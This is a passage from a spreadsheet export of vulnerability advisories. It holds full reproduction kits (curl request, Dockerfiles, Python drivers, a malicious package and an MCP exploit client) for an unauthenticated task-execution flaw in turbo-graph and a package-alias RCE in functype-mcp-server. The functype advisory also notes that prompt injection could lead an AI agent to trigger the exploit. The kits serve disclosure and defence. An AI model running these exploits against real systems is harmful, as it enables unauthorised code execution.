ss -tlnp 'sport = :29312'
# Expected: LISTEN 0 511 *:29312  (0.0.0.0, not 127.0.0.1)
```
**Attack request (from any host on the same network segment):**
```bash
# Replace &lt;victim-ip&gt; with the victim machine's LAN IP address.
curl -N "http://&lt;victim-ip&gt;:29312/api/run?tasks=pwn&amp;force=true"
```
**Expected outcome:**
- The server returns HTTP 200 with a `text/event-stream` response.
- An SSE `start` event is received with `args: ["run", "pwn", "--ui=stream", "--force"]`, confirming that the unauthenticated request was accepted.
- The file `/tmp/turbo-graph-poc` is created on the victim machine with content `owned`, proving arbitrary task execution.
**Containerized reproduction (automated):**
The enclosed `Dockerfile` and `poc.py` provide a self-contained reproduction. Build and run:
```bash
docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
docker run --rm vuln-001-poc
```
The container confirmed all three evidence points during Phase 2 dynamic testing:
1. `ss -tlnp sport=:29312` → `LISTEN 0 511 *:29312` (all-interface binding confirmed)
2. `GET /api/run?tasks=pwn&amp;force=true` → HTTP 200, SSE `start` event with `args: ["run","pwn","--ui=stream","--force"]` (no token required)
3. `/tmp/poc-proof.txt` created with content `PWNED:&lt;timestamp&gt;` (arbitrary task execution confirmed)
### Impact
This is a **Missing Authentication for Critical Function (CWE-306)** vulnerability. Any unauthenticated attacker reachable on the same network segment as a developer running `turbo-graph` can execute arbitrary Turborepo tasks defined in that developer's repository.
Depending on the tasks configured in the victim's `turbo.json`, the impact includes:
- **Confidentiality (High):** Tasks that read secrets, generate build artifacts, or invoke cloud CLI commands can exfiltrate sensitive data.
- **Integrity (High):** Tasks that write files, run migrations, commit code, or invoke deployment scripts can permanently modify the victim's project or infrastructure.
- **Availability (High):** Tasks that delete data, exhaust resources, or run destructive build steps can disrupt ongoing development work.
The attack requires no credentials, no prior access, and no interaction from the victim beyond having `turbo-graph` running. The default port (`29312`) is static and predictable, making targeted network scanning straightforward. All users who run `npx turbo-graph` or install `@yeger/turbo-graph@2.8.8` in a shared or corporate network environment are affected.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001 PoC: Unauthenticated Turborepo Task Execution (@yeger/turbo-graph@2.8.8)
#
# Layout:
#   /victim/          - simulated developer workspace that runs turbo-graph
#   /victim/pwn.js    - the task payload executed when the attacker fires /api/run
#   /poc.py           - attacker script: sends unauthenticated GET /api/run?tasks=pwn
#
# Build:
#   docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
#
# Run:
#   docker run --rm vuln-001-poc
FROM node:20-slim
# System tools:
#   python3    - runs poc.py
#   iproute2   - ss(8) for socket-binding introspection (evidence collection)
RUN apt-get update &amp;&amp; \
    apt-get install -y --no-install-recommends python3 iproute2 &amp;&amp; \
    rm -rf /var/lib/apt/lists/*
# ---------------------------------------------------------------------------
# Victim workspace: a minimal Turborepo project that a developer might run
# ---------------------------------------------------------------------------
WORKDIR /victim
# package.json: defines the 'pwn' task script and package dependencies.
# @yeger/turbo-graph@2.8.8 is the vulnerable package (from DerYeger/yeger).
# turbo satisfies the peerDependency and provides node_modules/.bin/turbo.
RUN echo '{"private":true,"name":"victim-project","packageManager":"npm@10.8.2","scripts":{"pwn":"node /victim/pwn.js"},"devDependencies":{"@yeger/turbo-graph":"2.8.8","turbo":"^2.0.0","react":"^18.0.0","react-dom":"^18.0.0"}}' \
    &gt; /victim/package.json
# turbo.json: declares the 'pwn' task with caching disabled so it always runs.
RUN echo '{"tasks":{"pwn":{"cache":false}}}' \
    &gt; /victim/turbo.json
# pwn.js: task payload — writes a timestamped proof file and logs to stdout.
# When an attacker sends GET /api/run?tasks=pwn, turbo-graph runs this script.
RUN echo 'const fs = require("fs"); const ts = Date.now().toString(); fs.writeFileSync("/tmp/poc-proof.txt", "PWNED:" + ts); console.log("TASK_EXECUTED:" + ts);' \
    &gt; /victim/pwn.js
# Install packages from the declarations in package.json.
# --legacy-peer-deps avoids strict peer-dep resolution failures.
# The published @yeger/turbo-graph-ui@2.8.8 tarball ships a pre-built
# .next/ directory, so no separate 'next build' step is required.
RUN npm install --legacy-peer-deps --no-fund --no-audit 2&gt;&amp;1 | tail -5
# ---------------------------------------------------------------------------
# Attacker PoC script
# ---------------------------------------------------------------------------
COPY poc.py /poc.py
# Default: execute the PoC (start server, fire unauthenticated request, verify)
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC for VULN-001: Unauthenticated Network-Exposed Turborepo Task Execution
Package:  @yeger/turbo-graph@2.8.8
CWE:      CWE-306 (Missing Authentication for Critical Function)
CVSS:     8.8 High (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Two independent flaws combine into the vulnerability:
  1. packages/turbo-graph/src/index.ts:44 calls .listen(port) without a
     hostname argument, so Node.js defaults to 0.0.0.0 (all interfaces).
  2. packages/turbo-graph-ui/app/api/run/route.ts:156-177 GET() handler
     has zero authentication; attacker-supplied ?tasks= values are passed
     directly to spawn(turboBin, ['run', ...tasks], { cwd: victimDir }).
Attack scenario reproduced here:
  - Victim runs `turbo-graph` from a project with a side-effecting task.
  - Attacker sends a plain unauthenticated GET /api/run?tasks=pwn.
  - The server executes `turbo run pwn` in the victim's project directory.
  - The 'pwn' task writes /tmp/poc-proof.txt, proving arbitrary execution.
"""
import os
import socket
import subprocess
import sys
import time
import urllib.error
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
PROOF_FILE = "/tmp/poc-proof.txt"
PORT = 29312
VICTIM_DIR = "/victim"
TURBO_GRAPH_BIN = os.path.join(VICTIM_DIR, "node_modules", ".bin", "turbo-graph")
SERVER_STARTUP_TIMEOUT = 120   # seconds; Next.js production startup can be slow
REQUEST_TIMEOUT = 90            # seconds to wait for the SSE stream to finish
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def wait_for_port(host: str, port: int, timeout: int) -&gt; bool:
    """Poll until the TCP port accepts connections or timeout expires."""
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with socket.create_connection((host, port), timeout=2):
                return True
        except (ConnectionRefusedError, OSError):
            time.sleep(1)
    return False
def get_socket_binding(port: int) -&gt; str:
    """Return the raw 'ss' output for the listening socket on *port*."""
    try:
        result = subprocess.run(
            ["ss", "-tlnp", f"sport = :{port}"],
            capture_output=True,
            text=True,
            timeout=5,
        )
        return result.stdout.strip()
    except Exception as exc:
        return f"(ss unavailable: {exc})"
def binding_is_all_interfaces(ss_output: str) -&gt; bool:
    """Return True when the socket is listening on all interfaces."""
    return any(
        marker in ss_output
        for marker in ("0.0.0.0", "*:", "[::]", ":::")
    )
def read_sse_stream(url: str, timeout: int) -&gt; list:
    """
    Open *url* as a Server-Sent Events stream and return parsed events.
    Each event is a dict with keys 'type' and optionally 'data'.
    Stops when an 'end' event is received or *timeout* seconds elapse.
    """
    events = []
    try:
        req = urllib.request.Request(
            url,
            headers={
                "Accept": "text/event-stream",
                "Cache-Control": "no-cache",
                "Connection": "keep-alive",
            },
        )
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            print(f"  [HTTP] {resp.status} {resp.reason}")
            print(f"  [HTTP] Content-Type: {resp.getheader('Content-Type', '')}")
            buf = ""
            deadline = time.time() + timeout
            while time.time() &lt; deadline:
                chunk = resp.read(4096)
                if not chunk:
                    break
                buf += chunk.decode("utf-8", errors="replace")
                # Parse complete SSE blocks (separated by blank lines)
                while "\n\n" in buf:
                    block, buf = buf.split("\n\n", 1)
                    ev: dict = {}
                    for line in block.strip().split("\n"):
                        if line.startswith("event: "):
                            ev["type"] = line[7:]
                        elif line.startswith("data: "):
                            ev["data"] = line[6:]
                        # ignore SSE comments (':') and 'retry:' lines
                    if ev.get("type"):
                        events.append(ev)
                        preview = ev.get("data", "")[:120]
                        print(f"  [SSE]  event={ev['type']}  data={preview}")
                        if ev["type"] == "end":
                            return events
    except urllib.error.HTTPError as exc:
        print(f"  [!] HTTP error: {exc.code} {exc.reason}")
    except Exception as exc:
        print(f"  [!] Stream error: {type(exc).__name__}: {exc}")
    return events
# ---------------------------------------------------------------------------
# Main PoC
# ---------------------------------------------------------------------------
def main() -&gt; int:
    sep = "=" * 64
    print(sep)
    print("VULN-001 PoC  —  Unauthenticated Turborepo Task Execution")
    print("Package : @yeger/turbo-graph@2.8.8")
    print("CWE-306 : Missing Authentication for Critical Function")
    print(sep)
    print()
    # Remove stale proof file from a previous run
    if os.path.exists(PROOF_FILE):
        os.remove(PROOF_FILE)
    # ------------------------------------------------------------------
    # Step 1: Start turbo-graph server from the victim project directory
    # The CLI does NOT pass a hostname to .listen(), so Node.js binds to
    # 0.0.0.0 (all interfaces) — see index.ts:44.
    # ------------------------------------------------------------------
    print(f"[1] Starting turbo-graph from {VICTIM_DIR} on port {PORT} ...")
    server = subprocess.Popen(
        [TURBO_GRAPH_BIN, "--port", str(PORT)],
        cwd=VICTIM_DIR,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
    )
    # ------------------------------------------------------------------
    # Step 2: Wait for the port to become available
    # ------------------------------------------------------------------
    print(f"[2] Waiting up to {SERVER_STARTUP_TIMEOUT}s for Next.js server startup ...")
    ready = wait_for_port("127.0.0.1", PORT, timeout=SERVER_STARTUP_TIMEOUT)
    if not ready:
        server.kill()
        stdout, _ = server.communicate()
        print(f"[!] Server did not become ready within {SERVER_STARTUP_TIMEOUT}s.")
        print(f"    stdout/stderr:\n{stdout[:2000]}")
        return 1
    print(f"[+] Server is accepting connections on port {PORT}.")
    # ------------------------------------------------------------------
    # Step 3: Verify that the socket is bound to 0.0.0.0 (all interfaces)
    # Flaw 1: .listen(port) without hostname → network-exposed.
    # ------------------------------------------------------------------
    ss_output = get_socket_binding(PORT)
    print(f"\n[3] Socket binding (ss -tlnp sport=:{PORT}):")
    print(f"    {ss_output}")
    if binding_is_all_interfaces(ss_output):
        print(f"[+] FLAW-1 CONFIRMED: Server bound to all interfaces (0.0.0.0 / ::), not loopback only.")
    else:
        print(f"[?] Could not confirm all-interface binding; proceeding with request test.")
    # ------------------------------------------------------------------
    # Step 4: Send an unauthenticated GET /api/run?tasks=pwn request
    # Flaw 2: no authentication, authorisation, CSRF check, or task
    #         allowlist — see route.ts:156-177.
    # ------------------------------------------------------------------
    url = f"http://127.0.0.1:{PORT}/api/run?tasks=pwn&amp;force=true"
    print(f"\n[4] Sending unauthenticated HTTP request (no token, no credentials):")
    print(f"    GET {url}")
    sse_events = read_sse_stream(url, timeout=REQUEST_TIMEOUT)
    # Allow a moment for any buffered I/O in the child process to flush
    time.sleep(3)
    # ------------------------------------------------------------------
    # Step 5: Evaluate exploitation results
    # ------------------------------------------------------------------
    exploited = os.path.exists(PROOF_FILE)
    proof_content = open(PROOF_FILE).read().strip() if exploited else ""
    start_event = next((e for e in sse_events if e.get("type") == "start"), None)
    end_event   = next((e for e in sse_events if e.get("type") == "end"),   None)
    log_events  = [e for e in sse_events if e.get("type") in ("log", "stderr")]
    print()
    print(sep)
    print("EVIDENCE SUMMARY")
    print(sep)
    # Evidence A: socket binding
    if binding_is_all_interfaces(ss_output):
        print(f"[A] FLAW-1  — Socket bound to all interfaces: {ss_output.split(chr(10))[0][:80]}")
    else:
        print(f"[A] FLAW-1  — ss output: {ss_output[:80]}")
    # Evidence B: unauthenticated SSE response
    if start_event:
        print(f"[B] FLAW-2  — Unauthenticated /api/run accepted; SSE start args:")
        print(f"              {start_event.get('data', '')}")
    else:
        received = [e.get("type") for e in sse_events]
        print(f"[B] FLAW-2  — SSE events received: {received}")
    # Evidence C: turbo task exit code
    if end_event:
        print(f"[C] TURBO   — turbo run exit code: {end_event.get('data', '')}")
    # Evidence D: proof file (arbitrary code execution)
    if exploited:
        print(f"[D] EXPLOIT — Proof file created: {PROOF_FILE}")
        print(f"              Content: {proof_content}")
    else:
        print(f"[D] EXPLOIT — Proof file NOT created: {PROOF_FILE}")
        if log_events:
            print(f"    Task stdout/stderr (first 5 lines):")
            for ev in log_events[:5]:
                print(f"      [{ev['type']}] {ev.get('data', '')}")
    print(sep)
    # Clean up
    server.kill()
    server.wait(timeout=10)
    if exploited:
        print("\n[RESULT] PASS — Exploitation reproduced. Proof file written by unauthenticated request.")
        return 0
    else:
        print("\n[RESULT] FAIL — Proof file not created. See evidence above for diagnostics.")
        return 1
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59160</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59172</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>go:github.com/candid82/joker</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>1.8.2</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr"/>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>## Impact
In Joker versions before 1.8.2, `joker --lint &lt;file&gt;` located a `.jokerd/` directory by walking up from the linted file and executed matching `linter.*` files from that directory before linting. Because these files are executable Joker/Clojure code, linting a file inside an untrusted repository could execute code supplied by that repository.
This could be triggered by editor integrations or CI jobs that automatically run `joker --lint` on checked-out source code.
## Patches
Fixed in Joker v1.8.2. Executable linter customization files are now loaded only from the user's home `.jokerd` directory (`~/.jokerd/linter.cljc`, `~/.jokerd/linter.clj`, `~/.jokerd/linter.cljs`, or `~/.jokerd/linter.joke`). Project-local `.jokerd/linter.*` files are no longer executed.
## Workarounds
Users who cannot upgrade should avoid running `joker --lint` on untrusted repositories, especially through editor integrations or unattended CI. Removing or disabling project-local `.jokerd/linter.*` files before linting also avoids the code-execution path.
## Credits
Reported by Younghun Ko of AhnLab (@koyokr).</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59172</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59176</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>npm:functype-mcp-server</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>1.4.4</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr"/>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>## MCP `set_functype_version` Package Alias RCE via Unsanitized pnpm install + Dynamic Import
### Summary
The `set_functype_version` MCP tool in `functype-mcp-server` accepts an unconstrained `version` string, interpolates it directly into an npm package specifier (`functype@&lt;version&gt;`), and installs it via `pnpm add` without any validation. Because npm/pnpm package specifiers support `file:`, `npm:`, and other alias syntaxes, an attacker who can send an MCP `tools/call` request to this tool can cause the server to install an arbitrary local or remote package as `functype`. Immediately after installation, the server calls `initDocsData(true)`, which dynamically imports `functype/cli` from the newly installed location, executing attacker-controlled JavaScript in the MCP server process. This results in full Remote Code Execution (RCE) with the privileges of the server process — full confidentiality, integrity, and availability impact (CVSS 7.8 High).
### Details
The vulnerable code is in `packages/mcp-server/src/index.ts`. The `set_functype_version` tool is registered at line 115 and is enabled by default (no authentication required in stdio mode).
**Source (user input accepted without validation):**
```ts
// packages/mcp-server/src/index.ts:119-121
parameters: z.object({
  version: z.string().describe('The functype version to install (e.g., "0.46.0", "latest", "^0.45.0")'),
}),
```
Only `z.string()` validation is applied — no semver format check, no allowlist for dist-tags, and no rejection of `file:`, `npm:`, URL, or path alias syntaxes.
**Sink 1 — arbitrary package installation:**
```ts
// packages/mcp-server/src/index.ts:122-125
execute: async (args) =&gt; {
  const spec = `functype@${args.version}`
  try {
    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
`args.version` is interpolated into the package specifier string and passed directly to `pnpm add`. Supplying `file:/path/to/evil` causes pnpm to install an attacker-controlled directory as the `functype` package alias.
**Sink 2 — dynamic import executes installed package code:**
```ts
// packages/mcp-server/src/lib/docs/data.ts:23-30
if (force) {
  const resolvedPath = require.resolve("functype/cli")
  cli = await import(`${pathToFileURL(resolvedPath).href}?t=${Date.now()}`)
}
```
`initDocsData(true)` is called immediately after installation (line 134 in `index.ts`). It resolves `functype/cli` from the node_modules that now points to the attacker's package and dynamically imports it, executing any module-level code in the attacker's `cli.js` at import time.
**Data flow summary:**
1. `index.ts:115` — MCP tool `set_functype_version` registered, no auth required.
2. `index.ts:119-121` — `version` accepted as raw `z.string()` (source).
3. `index.ts:123` — `functype@${args.version}` constructed without sanitization.
4. `index.ts:125` — `execFileSync("pnpm", ["add", spec], ...)` installs attacker-controlled package (sink: arbitrary install).
5. `index.ts:134` — `initDocsData(true)` called immediately.
6. `data.ts:29-30` — `require.resolve("functype/cli")` + dynamic `import()` executes attacker module (sink: RCE).
### PoC
**Step 1 — Prepare the attacker-controlled evil package:**
```bash
mkdir -p /tmp/evil
cat &gt; /tmp/evil/package.json &lt;&lt;'EOF'
{"name":"evil-functype","version":"1.0.0","type":"module","exports":{"./cli":"./cli.js"}}
EOF
cat &gt; /tmp/evil/cli.js &lt;&lt;'EOF'
import { writeFileSync } from "node:fs";
writeFileSync("/pwned.txt", "RCE: mcp import-time code execution via set_functype_version\n");
export const TYPES = {};
export const INTERFACES = {};
export const CATEGORIES = {};
export const FULL_INTERFACES = {};
export const VERSION = "1.0.0";
EOF
```
**Step 2 — Clone and build the victim monorepo at the affected version:**
```bash
TMP="$(mktemp -d)"
git clone https://github.com/jordanburke/functype.git "$TMP/functype"
cd "$TMP/functype"
git checkout v1.4.3
corepack enable
pnpm install --frozen-lockfile
pnpm -F functype build
pnpm -F functype-mcp-server build
```
**Step 3 — Set up an MCP client to deliver the exploit:**
```bash
cd "$TMP"
npm init -y
npm pkg set type=module
npm install @modelcontextprotocol/sdk
cat &gt; exploit.mjs &lt;&lt;'EOF'
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
const client = new Client({ name: "poc", version: "1.0.0" });
const transport = new StdioClientTransport({
  command: "node",
  args: [`${process.env.REPO}/packages/mcp-server/dist/bin.js`],
  env: { ...process.env, TRANSPORT_TYPE: "stdio" },
});
await client.connect(transport);
const result = await client.callTool({
  name: "set_functype_version",
  arguments: { version: "file:/tmp/evil" },
});
console.log(result);
await client.close();
EOF
REPO="$TMP/functype" node exploit.mjs
```
**Step 4 — Verify arbitrary code execution:**
```bash
cat /pwned.txt
# Expected output: RCE: mcp import-time code execution via set_functype_version
```
**Dynamic reproduction (Docker):**
The Phase 2 dynamic test used the provided Dockerfile which automates the above steps inside a container. The container confirmed creation of `/pwned.txt` with the expected payload string, proving end-to-end RCE.
```
[poc] EXPLOIT SUCCEEDED: /pwned.txt exists
[poc] File contents: RCE: mcp import-time code execution via set_functype_version
[evil-payload] Arbitrary code executed via functype/cli dynamic import
```
**Recommended remediation:**
```diff
+const SAFE_FUNCTYPE_VERSION = /^(?:latest|next|beta|alpha|canary|rc|[~^]?v?\d+(?:\.\d+){0,2}(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)$/
+
+const isSafeFunctypeVersion = (version: string): boolean =&gt; {
+  const trimmed = version.trim()
+  return trimmed === version &amp;&amp; SAFE_FUNCTYPE_VERSION.test(trimmed) &amp;&amp; !/[/:\\@]/.test(trimmed)
+}
 execute: async (args) =&gt; {
-  const spec = `functype@${args.version}`
+  if (!isSafeFunctypeVersion(args.version)) {
+    return "Invalid functype version. Use a semver version, range prefix (^ or ~), or a known dist-tag."
+  }
+  const spec = `functype@${args.version}`
   try {
-    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
+    execFileSync("pnpm", ["add", "--ignore-scripts", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
### Impact
This is a **Remote Code Execution (RCE)** vulnerability. Any MCP client that can invoke the `set_functype_version` tool — which requires no authentication and is enabled by default in the stdio MCP server — can execute arbitrary JavaScript in the MCP server process.
**Who is impacted:**
- Developers and teams running `functype-mcp-server` (version 1.4.3) in their local or CI environments as an AI coding assistant integration.
- Users whose AI assistant (LLM agent) is connected to this MCP server and is susceptible to indirect prompt injection: a malicious document or web page read by the AI could trigger a `set_functype_version` call with a `file:` or `npm:` alias payload.
- In non-default `TRANSPORT_TYPE=httpStream` deployments, network-accessible attackers can exploit this without local access.
The full impact at exploitation is confidentiality, integrity, and availability — an attacker can read secrets from the process environment, modify files, or crash the server.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: MCP set_functype_version Package Alias RCE
#
# Build context: reports/npmAI_684_jordanburke__functype/
#   COPY repo/       -&gt; /workspace/functype/   (victim monorepo)
#   COPY vuln-001/   -&gt; supporting PoC files
#
# Build:  docker build -t vuln001-functype-rce -f vuln-001/Dockerfile .
# Run:    docker run --rm vuln001-functype-rce
#
# Expected exit 0 with "[poc] EXPLOIT SUCCEEDED" in output.
FROM node:24-slim
# Install pnpm matching the repo's packageManager field (pnpm@11.7.0).
RUN npm install -g pnpm@11.7.0 --quiet
# ── Victim workspace ──────────────────────────────────────────────────────────
WORKDIR /workspace/functype
COPY repo/ ./
# Install all workspace deps. --no-frozen-lockfile avoids hash mismatches
# caused by running on a different pnpm minor than the one that generated the
# lockfile; the installed versions are still constrained by the lockfile
# specifiers for the packages we care about.
RUN pnpm install --no-frozen-lockfile
# Build functype first (mcp-server externals functype at build time).
RUN pnpm -F functype build
# Build the MCP server binary (output: packages/mcp-server/dist/bin.js).
RUN pnpm -F functype-mcp-server build
# ── Attacker-controlled evil package ─────────────────────────────────────────
# /evil/cli.js writes /pwned.txt when dynamically imported.
COPY vuln-001/evil/ /evil/
# ── MCP exploit client ────────────────────────────────────────────────────────
WORKDIR /client
RUN npm init -y --quiet &amp;&amp; \
    npm pkg set type=module &amp;&amp; \
    npm install @modelcontextprotocol/sdk@1.29.0 --quiet
COPY vuln-001/client/exploit.mjs ./exploit.mjs
# Default entrypoint: run the exploit and exit 0 on success.
CMD ["node", "/client/exploit.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC driver for VULN-001: MCP set_functype_version Package Alias RCE
via Unsanitized pnpm install + Dynamic Import (CWE-829, CVSS 7.8 High).
Attack chain:
  1. Attacker calls MCP tool set_functype_version with version="file:/evil"
  2. Server executes: execFileSync("pnpm", ["add", "functype@file:/evil"], ...)
  3. Evil package is installed as the functype alias in mcp-server's node_modules
  4. Server calls initDocsData(true) which resolves functype/cli and dynamic-imports it
  5. /evil/cli.js runs at import time -&gt; writes /pwned.txt (arbitrary code execution)
Usage:
  python3 poc.py [--build-only]
Requirements:
  - Docker daemon running
  - Build context at parent directory of this file's directory
"""
import subprocess
import sys
import json
import os
import argparse
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
REPORT_DIR = os.path.dirname(VULN_DIR)
IMAGE_NAME = "vuln001-functype-rce"
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
RESULT_FILE = os.path.join(VULN_DIR, "phase2_result.json")
BUILD_CMD = ["docker", "build", "-t", IMAGE_NAME, "-f", DOCKERFILE, REPORT_DIR]
RUN_CMD = ["docker", "run", "--rm", IMAGE_NAME]
def run(cmd, timeout=None, **kwargs):
    """Run a command and return CompletedProcess with combined output."""
    return subprocess.run(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
        timeout=timeout,
        **kwargs,
    )
def write_result(passed, verdict, reason, evidence):
    result = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": " ".join(BUILD_CMD),
        "run_command": " ".join(RUN_CMD),
        "poc_command": f"python3 {os.path.basename(__file__)}",
        "evidence": evidence,
        "artifacts": ["Dockerfile", "poc.py", "evil/package.json", "evil/cli.js", "client/exploit.mjs"],
    }
    with open(RESULT_FILE, "w", encoding="utf-8") as f:
        json.dump(result, f, indent=2, ensure_ascii=False)
    print(f"[poc] Result written to {RESULT_FILE}")
    print(f"[poc] verdict={verdict}  passed={passed}")
def main():
    parser = argparse.ArgumentParser(description="VULN-001 PoC driver")
    parser.add_argument("--build-only", action="store_true", help="Only build the image, do not run")
    args = parser.parse_args()
    # ── Build ─────────────────────────────────────────────────────────────────
    print("[poc] Building Docker image (this may take a few minutes)...")
    print(f"[poc] Build command: {' '.join(BUILD_CMD)}")
    try:
        build = run(BUILD_CMD, timeout=900)
    except subprocess.TimeoutExpired:
        msg = "Docker build timed out after 900 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"빌드 타임아웃: {msg}", msg)
        sys.exit(2)
    if build.returncode != 0:
        tail = (build.stdout + "\n" + build.stderr)[-3000:]
        print("[poc] Build FAILED:")
        print(tail)
        write_result(
            False,
            "FAIL",
            "Docker 이미지 빌드 실패. pnpm install 또는 TypeScript 빌드 오류 확인 필요.",
            f"BUILD EXIT {build.returncode}\n{tail}",
        )
        sys.exit(1)
    print("[poc] Build succeeded.")
    if args.build_only:
        print("[poc] --build-only flag set; skipping run.")
        sys.exit(0)
    # ── Run ───────────────────────────────────────────────────────────────────
    print(f"[poc] Running exploit container: {' '.join(RUN_CMD)}")
    try:
        run_result = run(RUN_CMD, timeout=180)
    except subprocess.TimeoutExpired:
        msg = "Container run timed out after 180 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"컨테이너 실행 타임아웃: {msg}", msg)
        sys.exit(2)
    stdout = run_result.stdout or ""
    stderr = run_result.stderr or ""
    combined = stdout + "\n" + stderr
    print("=" * 60)
    print("STDOUT:")
    print(stdout)
    print("STDERR:")
    print(stderr)
    print(f"EXIT CODE: {run_result.returncode}")
    print("=" * 60)
    # Success criteria: exit 0 AND exploit succeeded message present
    exploit_succeeded = "EXPLOIT SUCCEEDED" in combined
    passed = run_result.returncode == 0 and exploit_succeeded
    if passed:
        # Extract key evidence lines
        evidence_lines = [
            line for line in combined.splitlines()
            if any(kw in line for kw in ("EXPLOIT SUCCEEDED", "pwned.txt", "evil-payload", "RCE:"))
        ]
        evidence = "\n".join(evidence_lines) if evidence_lines else combined[-1000:]
        write_result(
            True,
            "PASS",
            (
                "컨테이너 내 /pwned.txt 생성 확인: MCP set_functype_version 도구에 "
                'version="file:/evil" 인수를 전달하자 서버가 pnpm add functype@file:/evil을 실행한 후 '
                "initDocsData(true)가 동적 import를 통해 evil/cli.js를 실행, 임의 파일 쓰기(RCE)가 발생함."
            ),
            evidence,
        )
        print("[poc] === PASS: exploit reproduced ===")
        sys.exit(0)
    else:
        # Distinguish failure modes
        if not exploit_succeeded and run_result.returncode == 0:
            verdict = "INCOMPLETE"
            reason = (
                "/pwned.txt가 생성되지 않았으나 컨테이너는 정상 종료됨. "
                "pnpm add 후 require.resolve 경로 확인 필요 — pnpm 가상 스토어 구조로 인해 "
                "node_modules/functype 심볼릭링크가 예상 위치에 없을 수 있음."
            )
        else:
            verdict = "FAIL"
            reason = (
                f"컨테이너 종료 코드 {run_result.returncode}. "
                "exploit.mjs 오류 또는 MCP 서버 시작 실패. 로그 확인 필요."
            )
        write_result(False, verdict, reason, combined[-2000:])
        print(f"[poc] === {verdict}: exploit did not reproduce ===")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59176</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59177</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
